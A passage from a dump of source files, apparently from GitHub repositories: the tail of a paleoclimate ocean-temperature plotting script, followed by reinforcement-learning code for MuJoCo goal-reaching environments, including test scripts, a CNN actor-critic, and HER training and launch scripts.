dim=\"lon\")\nCESMatl = CESMatl.mean(dim='lon')\nCESMatl['z_t'] = CESMatl['z_t']/100\nCESM12 = CESMatl\nLOVE = LOVE.PT\nLOVE = LOVE.mean(dim='TIME')\nAWI = AWI.PTEMP\nAWI = AWI.mean(dim='AX007')\nMPI4 = MPI4.PTEMP\nMPI4 = MPI4.mean(dim='AX007')\nMIROC_4 = MIROC_4.PTEMP\n# MIROC_4 = MIROC_4.mean(dim='time')\n\n# cleaning up LOVE\nweakNA = weakNA.PTEMP\nweakNA_AB = weakNA_AB.PTEMP\n\n\n# putting into lists\nPMIP3models = [CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4]\nPMIP3names = ['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\n\n#PMIP4models = [MIROC_4, IPSL_4, MPI_4,AWI,LOVECLIM,CESM12,CCSM4UoT]\n#PMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\nPMIP4names= ['MIROC-ES2L','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2']\n\nLOVEmodels = [weakNA,weakNA_AB]\nLOVEnames = ['weakNA','weakNA_AB']\n\n# renaming\nPMIP3models[0] = PMIP3models[0].rename({\"LEV1\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[1] = PMIP3models[1].rename({\"LEV3\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[2] = PMIP3models[2].rename({\"LEV4\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[3] = PMIP3models[3].rename({\"LEV5\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[4] = PMIP3models[4].rename({\"LEV6\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[5] = PMIP3models[5].rename({\"LEV7\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[6] = PMIP3models[6].rename({\"LEV2\": \"lev\",\"LAT\": \"lat\"})\nPMIP3models[7] = PMIP3models[7].rename({\"LEV\": \"lev\",\"LAT\": \"lat\"})\n\n# setting up desired levels\nfirst = np.arange(-2,2.2,0.2)\nsecond = np.arange(2,8.5,.5)\nthird = np.arange(8,30,3)\nbounds = []\nfor numbers in first:\n bounds.append(numbers)\nfor numbers in second:\n bounds.append(numbers)\nfor numbers in third:\n bounds.append(numbers)\nnrows=4\nncols=4\n\nfig, ax = plt.subplots(nrows=nrows,ncols=ncols,figsize=(16,10),sharey='row',sharex='col')\n\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nax=ax.flatten()\n\ncm = plt.cm.get_cmap('RdYlBu_r')\ncmap = mpl.cm.RdYlBu_r\n\nnorm = mpl.colors.BoundaryNorm(bounds, cmap.N, extend='both')\nlevels = 75 #75\n\nfor n in range(15):\n for axis in ['top','bottom','left','right']:\n ax[n].spines[axis].set_linewidth(3)\n\n # PMIP 3\nfor i in range(len(PMIP3names)):\n ax[i].contourf(PMIP3models[i].lat,PMIP3models[i].lev,PMIP3models[i],norm=norm,cmap=cm,levels = levels)\n ax[i].text(-60,4800,PMIP3names[i])\n ax[i].grid(ls=':')\n #ax[i].invert_yaxis()\n ax[i].set_xlim(-75,-35)\n ax[i].set_ylim(5000,0) #by 500 is how i did it before\n ax[i].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n\n\n# until I get all the models going\nax[8].contourf(MIROC_4.LAT,MIROC_4.LEV,MIROC_4,norm=norm,cmap=cm,levels = levels)\nax[9].contourf(MPI4.LAT,MPI4.LEV,MPI4,norm=norm,cmap=cm,levels = levels)\nax[10].contourf(AWI.LAT,AWI.DEPTH,AWI,norm=norm,cmap=cm,levels = levels)\nax[11].contourf(LOVE.LAT,LOVE.Z,LOVE-273.15,norm=norm,cmap=cm,levels = 1000)\nax[12].contourf(CESM12.lat,CESM12.z_t,CESM12,norm=norm,cmap=cm,levels = levels)\n\n# PMIP4\nfor j in range(5):\n # ax[j+8].contourf(PMIP4models[j].lon,PMIP4models[j].lat,PMIP4models[j],norm=norm,cmap=cm,levels = levels)\n ax[j+8].text(-60,4800,PMIP4names[j])\n ax[j+8].grid(ls=':')\n #ax[i].invert_yaxis() CESM needs inversion\n ax[j+8].set_xlim(-75,-35)\n ax[j+8].set_ylim(5000,0) #by 500 is how i did it before\n ax[j+8].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n\n\n\n# LOVE sensitivity\nfor l in range(2):\n ax[l+13].contourf(LOVEmodels[l].LAT,LOVEmodels[l].Z,LOVEmodels[l],norm=norm,cmap=cm,levels = levels)\n ax[l+13].text(-60,4800,LOVEnames[l])\n ax[l+13].grid(ls=':')\n ax[l+13].invert_yaxis()\n ax[l+13].set_xlim(-75,-35)\n ax[l+13].set_ylim(5000,0) #by 500 is how i did it before\n ax[l+13].tick_params(axis=\"both\", direction=\"out\", length=5, width=3, color=\"black\")\n\nax[15].axis('off')\nfig.add_subplot(111, frameon=False)\n# hide tick and tick label of the big axes\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.grid(False)\nplt.ylabel(\"Depth (m)\",fontsize=15,fontweight='bold')\nplt.xlabel(\"Latitude (˚)\",fontsize=15,fontweight='bold')\n\n#plt.tight_layout()\ncb = plt.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),ax=ax.ravel().tolist(), shrink=0.975)\ncb.set_label(label='Temperature ($^{\\circ}$C)', size='large', weight='bold')\ncb.ax.tick_params(labelsize='large')\n\n#plt.show()\nplt.savefig('Figures/Figure4_SO.pdf')\n"
}
] | 10 |
harjatinsingh/mujoco-env | https://github.com/harjatinsingh/mujoco-env | 0a364ff64a7f026dca4bef35d2a822d7b000a4b7 | 57e37a448c07f9ce537ecf946478d5a287495080 | f6426f34e05a2f5f180f0ae6592bf9283e3c8cae | refs/heads/master | 2020-03-18T17:03:54.049239 | 2018-06-20T16:15:41 | 2018-06-20T16:15:41 | 135,003,913 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5259116888046265,
"alphanum_fraction": 0.5595009326934814,
"avg_line_length": 28.799999237060547,
"blob_id": "a5ff9590174bda58dc86747d172352e1eea79add",
"content_id": "e785ef1329b9ba0556c3553584bdcb458c266c22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1042,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 35,
"path": "/baselines_hrl/test/square2d_visual_test.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018\nimport gym\nimport envs\nimport cv2 as cv\nimport scipy.misc\nfrom pprint import pprint\n\nfrom envs.square2d import Square2dVisualSimpleEnv\nimport time\nimport numpy as np\nif __name__ == '__main__':\n test_env = 'Square2dVisualSimple-v0'\n #env = gym.make(test_env)\n env = Square2dVisualSimpleEnv(horizon=10000)\n for i in range(5):\n env.reset()\n done = False\n time_count = 0\n while not done:\n time_count += 1\n action = env.action_space.sample()\n #env.set_goal_location([0.3,0.3])\n obs, reward, done, _ = env.step(action)\n #print(env.get_goal_location())\n #print(len(obs))\n #print(reward.shape)\n #print(done.shape)\n #print(reward)\n img = env.render()\n #print(img.shape)\n cv.imshow('display', obs['observation'])\n #cv.imshow('display', obs['desired_goal'])\n cv.waitKey(1)\n #time.sleep(1000000)\n time.sleep(3)"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12,
"blob_id": "b50f2748dcf72b2f85479b6fd660b8823c0a1918",
"content_id": "fd588b8f2dc510ceca4ebfb0af6182c04eb405fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 1,
"path": "/README.md",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# mujoco-env\n"
},
{
"alpha_fraction": 0.49089905619621277,
"alphanum_fraction": 0.5173745155334473,
"avg_line_length": 29.233333587646484,
"blob_id": "5896b54eb301e1f1deda4964e0d1fffcc57a172d",
"content_id": "2feec9c48407cb2beae1f8741e2ac433377a3f55",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1813,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 60,
"path": "/baselines_hrl/test/square2d_visual_play.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018\nimport gym\nimport envs\nimport cv2 as cv\nimport scipy.misc\nimport pickle\nfrom pprint import pprint\n\n\nfrom envs.square2d import Square2dVisualSimpleEnv\nimport time\nimport numpy as np\nif __name__ == '__main__':\n test_env = 'Square2dVisual-v0'\n #env = gym.make(test_env)\n policy_file = '/media/part/cmu_ri/deep/deep_RL/data/local/square2d-debug/square2d_debug_2018_06_17/policy_best.pkl'\n with open(policy_file, 'rb') as f:\n policy = pickle.load(f)\n #env_name = policy.info['env_name']\n\n\n env = Square2dVisualSimpleEnv(horizon=1000)\n for i in range(5):\n obs = env.reset()\n done = False\n time_count = 0\n while not done:\n o = obs['observation']\n ag = obs['achieved_goal']\n g = obs['desired_goal']\n \n action = policy.get_actions(o.flatten(),ag,g)\n #action = env.action_space.sample()\n print(action)\n \n time_count += 1\n #action = env.action_space.sample()\n #env.set_goal_location([0.3,0.3])\n obs, reward, done, info = env.step(action)\n #print(done)\n #print(info['is_success'])\n #print(reward)\n if reward == -0.0:\n done = True\n #print(reward)\n #input(\"-----------------\")\n \n print(reward) \n #print(env.get_goal_location())\n #print(len(obs))\n #print(reward.shape)\n #print(done.shape)\n #print(reward)\n img = env.render()\n #print(img.shape)\n cv.imshow('display', o)\n #cv.imshow('display', obs['desired_goal'])\n cv.waitKey(100)\n #time.sleep(1000000)\n time.sleep(3)"
},
{
"alpha_fraction": 0.5465013384819031,
"alphanum_fraction": 0.5562444925308228,
"avg_line_length": 28.710525512695312,
"blob_id": "00f6d08b38aaa31d49d24a1cfc43f986e2c4a142",
"content_id": "9204f6ef875f230e35a71a310b20ab5116e636c9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1129,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 38,
"path": "/baselines_hrl/test/env_test.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 18/03/2018 \nimport gym\nimport envs\nfrom envs.gym_robotics_visual import utils\nimport scipy.misc\n\n\ndef test_image_rendering():\n env = gym.make(test_env)\n obs = env.reset()\n rgbd_img = env.env.get_image_obs(depth=True)\n rgb_img = rgbd_img[:, :, :3]\n dep_img = rgbd_img[:, :, -1]\n scipy.misc.imsave('./test/obs_rgb.jpg', rgb_img)\n scipy.misc.imsave('./test/obs_d.jpg', dep_img)\n\n goal_rgb_img, goal_dep_img = utils.separate_img(obs['desired_goal'])\n scipy.misc.imsave('./test/goal_rgb.jpg', goal_rgb_img)\n scipy.misc.imsave('./test/goal_d.jpg', goal_dep_img)\n\n # while True:\n # action = env.action_space.sample()\n # obs, _, _, _ = env.step(action)\n # env.render()\n\ndef test_visualization():\n env = gym.make(test_env)\n env.reset()\n while True:\n action = env.action_space.sample()\n obs, _, _, _ = env.step(action)\n env.render()\n\n\nif __name__ == '__main__':\n test_env = 'VisualFetchSlide-v0'\n test_image_rendering()\n # test_visualization()\n"
},
{
"alpha_fraction": 0.5246672034263611,
"alphanum_fraction": 0.5408509373664856,
"avg_line_length": 44.60714340209961,
"blob_id": "ecf28e31aa4237e9a14b3371344995ea742604a5",
"content_id": "eeacd17f2bdf11b78e64e18e1afefa09d3b64fbf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3831,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 84,
"path": "/baselines_hrl/baselines/her/cnn_actor_critic.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 25/03/2018 \nimport tensorflow as tf\nfrom baselines.her.util import store_args, nn\nimport numpy as np\n\n\ndef cnn_one_stream(input_net, scope='phi', reuse=False):\n with tf.variable_scope(scope, reuse=reuse):\n net = tf.layers.conv2d(name='conv1', inputs=input_net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n net = tf.layers.max_pooling2d(net, [3, 3], 2, padding='valid')\n net = tf.layers.conv2d(name='conv2', inputs=net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n net = tf.layers.max_pooling2d(net, [3, 3], 2, padding='valid')\n net = tf.layers.conv2d(name='conv3', inputs=net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n net = tf.layers.max_pooling2d(net, [3, 3], 2, padding='valid')\n net = tf.layers.conv2d(name='conv4', inputs=net, filters=64, kernel_size=[2, 2], padding='same',\n activation=tf.nn.relu)\n shape = net.get_shape().as_list() # a list: [None, 9, 2]\n dim = np.prod(shape[1:]) # dim = prod(9,2) = 18\n net = tf.reshape(net, [-1, dim])\n\n net = tf.layers.dense(name='conv_fc', inputs=net, units=64)\n return net\n\n\nclass CNNActorCritic:\n @store_args\n def __init__(self, inputs_tf, image_input_shapes, dimo, dimg, dimu, max_u, o_stats, g_stats, hidden, layers,\n **kwargs):\n \"\"\"The actor-critic network and related training code.\n\n Args:\n inputs_tf (dict of tensors): all necessary inputs for the network: the\n observation (o), the goal (g), and the action (u)\n dimo (int): the dimension of the observations\n dimg (int): the dimension of the goals\n dimu (int): the dimension of the actions\n max_u (float): the maximum magnitude of actions; action outputs will be scaled\n accordingly\n o_stats (baselines.her.Normalizer): normalizer for observations\n g_stats (baselines.her.Normalizer): normalizer for goals\n hidden (int): number of hidden units that should be used in hidden layers\n layers (int): number of hidden layers\n \"\"\"\n self.o_tf = inputs_tf['o']\n self.g_tf = inputs_tf['g']\n self.u_tf = inputs_tf['u']\n\n # Prepare inputs for actor and critic.\n o = self.o_stats.normalize(self.o_tf)\n g = self.g_stats.normalize(self.g_tf)\n o = tf.reshape(o, [-1, *image_input_shapes['o']])\n g = tf.reshape(g, [-1, *image_input_shapes['g']])\n\n #print(o.shape)\n #input(\"--------------------\")\n # input_pi = tf.concat(axis=1, values=[o, g]) # for actor\n\n # Networks.\n \n \n x_o = cnn_one_stream(o, scope='phi', reuse=False)\n #print(x_o.shape)\n #input(\"----------------\")\n #x_g = cnn_one_stream(g, scope='phi', reuse=True)\n x_g = g\n \n\n x_concat = tf.concat(axis=1, values=[x_o, x_g])\n\n with tf.variable_scope('pi'):\n self.pi_tf = self.max_u * tf.tanh(nn(\n x_concat, [self.hidden] * self.layers + [self.dimu]))\n\n with tf.variable_scope('Q'):\n # for policy training\n input_Q = tf.concat(axis=1, values=[x_concat, self.pi_tf / self.max_u])\n self.Q_pi_tf = nn(input_Q, [self.hidden] * self.layers + [1])\n # for critic training\n input_Q = tf.concat(axis=1, values=[x_concat, self.u_tf / self.max_u])\n self._input_Q = input_Q # exposed for tests\n self.Q_tf = nn(input_Q, [self.hidden] * self.layers + [1], reuse=True)\n"
},
{
"alpha_fraction": 0.5327711701393127,
"alphanum_fraction": 0.5500191450119019,
"avg_line_length": 37.94029998779297,
"blob_id": "4ffb00addebe119e8b70697cb5b7623fa4b01851",
"content_id": "f62d0053927dcc2355404bdf8d73b5541fff06b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2609,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 67,
"path": "/baselines_hrl/experiments/train_launch.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 25/03/2018\nimport time\nfrom chester.run_exp import run_experiment_lite, VariantGenerator\nfrom experiments.train import run_task\n\nif __name__ == '__main__':\n\n TestVisual = False\n Debug = False\n # Test FakeGoals\n if not TestVisual:\n # exp_prefix = 'FakeGoals_unique_zero'\n exp_prefix = 'square2d'\n vg = VariantGenerator()\n # vg.add('env_name', ['FetchPush-v0', 'FetchReach-v0'])\n vg.add('env_name', ['Square2dVisualSimple-v0'])\n # vg.add('env_name', ['FetchReach-v0', 'FetchSlide-v0', 'FetchPush-v0'])\n vg.add('network', ['cnn_fc'])\n vg.add('n_epochs', [200])\n\n # vg.add('replay_strategy', ['future', 'only_fake'])\n vg.add('replay_strategy', ['future', 'only_fake'])\n vg.add('replay_sample_strategy', ['random']) # TODO implementing 'prioritized', add to visual\n vg.add('reward_type',\n lambda replay_strategy: ['reward_func'] if replay_strategy == 'future' else ['reward_func',\n 'unique_zero'])\n # TODO add to visual\n vg.add('replay_k', lambda replay_strategy: [4] if replay_strategy == 'future' else [4])\n else:\n # Test Visual\n exp_prefix = 'square2d'\n vg = VariantGenerator()\n vg.add('network', ['cnn_fc'])\n vg.add('env_name', ['Square2dVisual-v0'])\n vg.add('n_epochs', [200])\n vg.add('replay_strategy', ['future'])\n vg.add('replay_k', lambda replay_strategy: [4] if replay_strategy == 'future' else [4])\n\n if Debug:\n exp_prefix += '_debug'\n # 'the HER replay strategy to be used. \"future\" uses HER, \"none\" disables HER.'\n vg.add('clip_return', [1])\n # 'whether or not returns should be clipped'\n vg.add('num_cpu', [1])\n vg.add('policy_save_interval', [5])\n vg.add('save_policies', [True])\n if Debug:\n vg.add('seed', [0])\n else:\n vg.add('seed', [100, 300, 400])\n print('Number of configurations: ', len(vg.variants()))\n sub_process_popens = []\n for vv in vg.variants():\n while len(sub_process_popens) >= 2:\n sub_process_popens = [x for x in sub_process_popens if x.poll() is None]\n time.sleep(10)\n cur_popen = run_experiment_lite(\n stub_method_call=run_task,\n variant=vv,\n mode='local',\n exp_prefix=exp_prefix,\n wait_subprocess=Debug\n )\n if cur_popen is not None:\n sub_process_popens.append(cur_popen)\n if Debug:\n break\n"
},
{
"alpha_fraction": 0.85467129945755,
"alphanum_fraction": 0.85467129945755,
"avg_line_length": 56.79999923706055,
"blob_id": "515d80252e8f634199d0d5486e3b11c1059ae3a0",
"content_id": "1ee7dd255204c1ea38bdf2451b25e1976d5571b7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 578,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 10,
"path": "/baselines_hrl/envs/gym_robotics_visual/__init__.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from envs.gym_robotics_visual.fetch_env import FetchEnv\nfrom envs.gym_robotics_visual.fetch.slide import FetchSlideEnv\nfrom envs.gym_robotics_visual.fetch.pick_and_place import FetchPickAndPlaceEnv\nfrom envs.gym_robotics_visual.fetch.push import FetchPushEnv\nfrom envs.gym_robotics_visual.fetch.reach import FetchReachEnv\n\nfrom envs.gym_robotics_visual.hand.reach import HandReachEnv\nfrom envs.gym_robotics_visual.hand.manipulate import HandBlockEnv\nfrom envs.gym_robotics_visual.hand.manipulate import HandEggEnv\nfrom envs.gym_robotics_visual.hand.manipulate import HandPenEnv\n"
},
{
"alpha_fraction": 0.7124735713005066,
"alphanum_fraction": 0.7568710446357727,
"avg_line_length": 25.33333396911621,
"blob_id": "85998917be76719dffede3e907878310cc536f45",
"content_id": "6988ecfb60900a9e306901ec39dab95c215f2c78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 473,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 18,
"path": "/simulation.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from mujoco_py import load_model_from_path, MjSim, MjViewer\nimport os\nimport numpy as np\nfrom pprint import pprint\nfrom os import path\nfrom goalEnvironment import goalEnvironment\n\n\nenv = goalEnvironment(\"/home/frc-vision/Desktop/git/mujoco-env/xmls/goal.xml\")\nenv.viewer_setup()\nenv.set_goal_location(0.3,0.3)\nenv.set_frame_skip(2)\n\nwhile True:\n\t#env.send_control_command(0.002,0.002)\n\tctrl = np.asarray([0.002,0.002])\n\tobs, reward, done = env.step(ctrl)\n\tenv.render_view()"
},
{
"alpha_fraction": 0.6082192063331604,
"alphanum_fraction": 0.6630136966705322,
"avg_line_length": 72.19999694824219,
"blob_id": "3d7b81a4230e6ffb950825f5ff6c421e871f7f5e",
"content_id": "e523690c8cb325acc8c2335da001987b16b34917",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 5,
"path": "/baselines_hrl/envs/square2d/__init__.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018 \nfrom envs.square2d.square2d_env import Square2dEnv\nfrom envs.square2d.square2d_visual_env import Square2dVisualEnv\nfrom envs.square2d.square2d_visual_simple_env import Square2dVisualSimpleEnv\nfrom envs.square2d.square2d_simple import Square2dSimpleEnv"
},
{
"alpha_fraction": 0.654277503490448,
"alphanum_fraction": 0.6699775457382202,
"avg_line_length": 26.377193450927734,
"blob_id": "c7a8e44b1563b9c844e74ffd9bec1a5a3113613d",
"content_id": "ffe72af617ff3d57b6f0723f4e324821a8911cfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3121,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 114,
"path": "/goalEnvironment.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from mujoco_py import load_model_from_path, MjSim, MjViewer\nimport os\nimport numpy as np\nfrom pprint import pprint\nfrom os import path\n\n\n\nclass goalEnvironment():\n\n\t def __init__(self, model_path, distance_threshold = 1e-1, frame_skip = 1):\n\n\t \tif model_path.startswith(\"/\"):\n\t \t\tfullpath = model_path\n\t \telse:\n\t \t\tfullpath = os.path.join(os.path.dirname(__file__), \"assets\", model_path)\n\t \tif not path.exists(fullpath):\n\t \t\traise IOError(\"File %s does not exist\" % fullpath)\n\n\t \tself.model = load_model_from_path(fullpath)\n\t \tself.sim = MjSim(self.model)\n\t \tself.data = self.sim.data\n\t \tself.viewer = MjViewer(self.sim)\n\t \tself.distance_threshold = distance_threshold\n\t \tself.frame_skip = frame_skip\n\n\t def viewer_setup(self):\n\n\t self.viewer.cam.lookat[0] = 0.0 # x,y,z offset from the object (works if trackbodyid=-1)\n\t self.viewer.cam.lookat[1] = 0.0\n\t self.viewer.cam.lookat[2] = 0.0\n\t self.viewer.cam.elevation = -90 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)\n\t self.viewer.cam.azimuth = 90 \n\t self.viewer.cam.distance = 1.5\n\n\t def set_goal_location(self,xLoc,yLoc):\n\t \t\n\t \tself.sim.data.qpos[0] = xLoc\n\t \tself.sim.data.qpos[1] = yLoc\n\n\t def set_ball_location(self,xLoc,yLoc):\n\t \t\n\t \tself.sim.data.qpos[2] = xLoc\n\t \tself.sim.data.qpos[3] = yLoc\t\n\n\t def set_distance_threshold(self,distance_threshold):\n\t \tself.distance_threshold = distance_threshold\n\n\t def set_frame_skip(self,frame_skip):\n\t \tself.frame_skip = frame_skip\n\n\t def get_frame_skip(self):\n\t \treturn (self.frame_skip)\n\n\t def get_distance_threshold(self):\n\t \treturn (self.distance_threshold) \n\n\t def get_ball_location(self):\n\t \treturn (self.sim.data.qpos[2:4])\t\n\n\t def get_goal_location(self):\n\t \treturn (self.sim.data.qpos[0:2])\n\n\t def get_ball_velocity(self):\n\t \treturn (self.sim.data.qvel[2:4])\n\n\t def send_control_command(self,xDirectionControl,yDirectionControl):\n\n\t \tself.sim.data.ctrl[0] = xDirectionControl\n\t \tself.sim.data.ctrl[1] = yDirectionControl\n\n\t def get_current_observation(self):\n\t \treturn np.concatenate([self.get_goal_location(), self.get_ball_location(), self.get_ball_velocity()]).ravel()\n\n\t def get_image_of_goal_observation(self, xLoc = None, yLoc = None):\n\t \t\n\t \tif not xLoc:\n\t \t\txLoc = self.sim.data.qpos[0]\n\t \t\n\t \tif not yLoc:\n\t \t\tyLoc = self.sim.data.qpos[1]\t\n\t \t\n\t \tself.sim.data.qpos[0] = xLoc\n\t \tself.sim.data.qpos[1] = yLoc\n\t \tself.sim.data.qpos[2] = xLoc\n\t \tself.sim.data.qpos[3] = yLoc\n\n\t \tself.render_view()\n\n\t def do_simulation(self, ctrl, n_frames):\n\n\t \tself.send_control_command(ctrl[0],ctrl[1])\n\t \tfor _ in range(n_frames):\n\t \t\tself.take_step()\n\t\n\n\t def step(self, ctrl):\n\t \t\n\t \tself.do_simulation(ctrl, self.frame_skip)\n\t \tobs = self.get_current_observation()\n\t \treward = self.get_reward()\n\t \tdone = (reward == 1.0)\n\t \treturn obs, reward, done\n\n\t def take_step(self):\n\t \tself.sim.step()\n\n\t def render_view(self):\n\t \tself.viewer.render()\n\n\t def get_reward(self):\n\n\t \tdist = np.linalg.norm(self.sim.data.qpos[0:2] - self.sim.data.qpos[2:4], axis=-1)\t\n\t \treturn (dist < self.distance_threshold).astype(np.float32)\n"
},
{
"alpha_fraction": 0.6227259039878845,
"alphanum_fraction": 0.6279451251029968,
"avg_line_length": 36.25555419921875,
"blob_id": "8fb989ad97ab7c4091cfd06ab433a13e1700132c",
"content_id": "c1d543c1ef83730d83078149b235d2649621fe8f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6706,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 180,
"path": "/baselines_hrl/experiments/train.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport numpy as np\nimport json\nfrom mpi4py import MPI\n\nfrom baselines import logger\nfrom baselines.common import set_global_seeds\nfrom baselines.common.mpi_moments import mpi_moments\nfrom baselines.her.rollout import RolloutWorker\nfrom baselines.her.util import mpi_fork\n\nimport experiments.config as config\n\nimport envs\n\n\ndef shapes_to_dims(input_shapes):\n return {key: np.prod(val) for key, val in input_shapes.items()}\n\n\ndef mpi_average(value):\n if value == []:\n value = [0.]\n if not isinstance(value, list):\n value = [value]\n return mpi_moments(np.array(value))[0]\n\n\ndef train(policy, rollout_worker, evaluator,\n n_epochs, n_test_rollouts, n_cycles, n_batches, policy_save_interval,\n save_policies, **kwargs):\n rank = MPI.COMM_WORLD.Get_rank()\n\n latest_policy_path = os.path.join(logger.get_dir(), 'policy_latest.pkl')\n best_policy_path = os.path.join(logger.get_dir(), 'policy_best.pkl')\n periodic_policy_path = os.path.join(logger.get_dir(), 'policy_{}.pkl')\n\n logger.info(\"Training...\")\n best_success_rate = -1\n for epoch in range(n_epochs):\n # train\n rollout_worker.clear_history()\n for _ in range(n_cycles):\n episode = rollout_worker.generate_rollouts()\n policy.store_episode(episode)\n for _ in range(n_batches):\n policy.train()\n policy.update_target_net()\n\n # test\n evaluator.clear_history()\n for _ in range(n_test_rollouts):\n evaluator.generate_rollouts()\n\n # record [logs\n logger.record_tabular('epoch', epoch)\n for key, val in evaluator.logs('test'):\n logger.record_tabular(key, mpi_average(val))\n for key, val in rollout_worker.logs('train'):\n logger.record_tabular(key, mpi_average(val))\n for key, val in policy.logs():\n logger.record_tabular(key, mpi_average(val))\n\n if rank == 0:\n logger.dump_tabular()\n\n # save the policy if it's better than the previous ones\n success_rate = mpi_average(evaluator.current_success_rate())\n if rank == 0 and success_rate >= best_success_rate and save_policies:\n best_success_rate = success_rate\n logger.info(\n 'New best success rate: {}. Saving policy to {} ...'.format(best_success_rate, best_policy_path))\n evaluator.save_policy(best_policy_path)\n evaluator.save_policy(latest_policy_path)\n if rank == 0 and policy_save_interval > 0 and epoch % policy_save_interval == 0 and save_policies:\n policy_path = periodic_policy_path.format(epoch)\n logger.info('Saving periodic policy to {} ...'.format(policy_path))\n evaluator.save_policy(policy_path)\n\n # make sure that different threads have different seeds\n local_uniform = np.random.uniform(size=(1,))\n root_uniform = local_uniform.copy()\n MPI.COMM_WORLD.Bcast(root_uniform, root=0)\n if rank != 0:\n assert local_uniform[0] != root_uniform[0]\n\n\ndef run_task(vv, log_dir=None, exp_name=None):\n override_params = {}\n # Fork for multi-CPU MPI implementation.\n if vv['num_cpu'] > 1:\n whoami = mpi_fork(vv['num_cpu'])\n if whoami == 'parent':\n sys.exit(0)\n import baselines.common.tf_util as U\n U.single_threaded_session().__enter__()\n rank = MPI.COMM_WORLD.Get_rank()\n\n\n log_dir='/media/part/cmu_ri/deep/deep_RL/data/local/square2d-debug/square2d_debug_2018_06_17/' #hack for now, fix later\n\n # Configure logging\n if rank == 0:\n if log_dir or logger.get_dir() is None:\n from pathlib import Path\n logger.configure(dir=log_dir, exp_name=exp_name)\n else:\n if log_dir or logger.get_dir() is None:\n from pathlib import Path\n logger.configure(dir=log_dir, exp_name=exp_name)\n\n logdir = logger.get_dir()\n #logdir = ''# a quick hack, fix later\n assert logdir is not None\n os.makedirs(logdir, exist_ok=True)\n\n # Seed everything.\n rank_seed = vv['seed'] + 1000000 * rank\n set_global_seeds(rank_seed)\n\n # Prepare params.\n params = config.DEFAULT_PARAMS\n params['env_name'] = vv['env_name']\n params['replay_strategy'] = vv['replay_strategy']\n params['replay_sample_strategy'] = vv['replay_sample_strategy']\n params['reward_type'] = vv['reward_type']\n params['replay_k'] = vv['replay_k']\n if vv['network'] == 'fc':\n params['network_class'] = 'baselines.her.actor_critic:ActorCritic'\n elif vv['network'] == 